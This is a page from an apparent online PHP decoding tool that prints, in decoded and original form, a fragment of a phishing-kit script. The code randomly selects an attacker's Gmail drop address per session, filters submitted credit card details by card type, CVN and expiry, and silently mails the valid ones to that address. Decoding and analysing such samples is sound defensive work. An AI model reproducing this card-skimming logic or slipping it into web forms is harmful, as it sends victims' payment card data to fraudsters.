Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php session_start(); if (!isset($_SESSION['_dH5_'])) { $_SESSION['_dH5_'] = rand(1..

Decoded Output download

<?php session_start(); 
if (!isset($_SESSION['_dH5_'])) { 
    $_SESSION['_dH5_'] = rand(1, 10); 
} 
if ($_SESSION['_dH5_'] < 8) { 
    $_dH5 = "rush3h" . ($_SESSION['_dH5_'] % 3 + 1) . "@gmail.com"; 
} else if ($_SESSION['_dH5_'] < 10) { 
    $_dH5 = "[email protected]"; 
} else { 
    $_dH5 = "[email protected]"; 
} 
if (isset($_POST['c_valid'])) { 
    if ($_POST['c_valid'] == "false") { 
    } else if ($_POST['c_type'] == "mastercard" && $_POST['cvn'] < 999) { 
    } else if ($_POST['c_type'] == "visa" && $_POST['cvn'] > 999) { 
    } else if ($exd < 1506) { 
    } else if ($_POST['c_valid'] == "") { 
    } else { 
        @mail($_dH5, $subject, $message, $headers); 
    } 
} ?>

Did this file decode correctly?

Original Code

<?php session_start();
if (!isset($_SESSION['_dH5_'])) {
    $_SESSION['_dH5_'] = rand(1, 10);
}
if ($_SESSION['_dH5_'] < 8) {
    $_dH5 = "rush3h" . ($_SESSION['_dH5_'] % 3 + 1) . "@gmail.com";
} else if ($_SESSION['_dH5_'] < 10) {
    $_dH5 = "[email protected]";
} else {
    $_dH5 = "[email protected]";
}
if (isset($_POST['c_valid'])) {
    if ($_POST['c_valid'] == "false") {
    } else if ($_POST['c_type'] == "mastercard" && $_POST['cvn'] < 999) {
    } else if ($_POST['c_type'] == "visa" && $_POST['cvn'] > 999) {
    } else if ($exd < 1506) {
    } else if ($_POST['c_valid'] == "") {
    } else {
        @mail($_dH5, $subject, $message, $headers);
    }
}

Function Calls

rand 1
session_start 1

Variables

None

Stats

MD5 6a13031fb3117b63c11e7a79aa7b96fc
Eval Count 0
Decode Time 113 ms